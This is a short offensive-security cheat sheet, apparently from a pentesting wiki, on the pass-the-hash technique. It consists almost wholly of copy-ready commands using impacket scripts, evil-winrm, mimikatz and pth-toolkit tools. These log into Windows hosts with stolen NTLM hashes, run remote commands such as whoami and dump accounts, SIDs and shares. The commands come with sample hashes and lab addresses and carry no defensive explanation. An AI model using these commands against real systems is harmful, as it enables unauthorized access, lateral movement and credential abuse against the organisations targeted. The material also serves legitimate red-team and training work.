Pass the Hash

Last updated 1 year ago

PsExec

proxychains -q psexec.py -k -no-pass domain.com/username@machine -dc-ip IP -target-ip IP

python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2

WinRM

evil-winrm -i 192.168.1.2 -u [domain\\]username -H 052e763020c5da81d4085a05e69b0f1b

WMI

python3 impacket/examples/wmiexec.py -k -no-pass [domain/]username@192.168.1.2

SQL

python3 impacket/examples/mssqlclient.py -p 1433  -windows-auth domain/username@1.1.1.1 -hashes :052e763020c5da81d4085a05e69b0f1b

Mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:admin /domain:red.local /ntlm:09238831b1af5edab93c773f56409d96" exit

Other

python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2/c$

pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2 "select Name from Win32_UserAccount"

python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.2

pth-net rpc share list -U 'ignite\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.2

python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 Administrator@192.168.1.2 whoami

python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2

python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/Administrator@192.168.1.2
https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/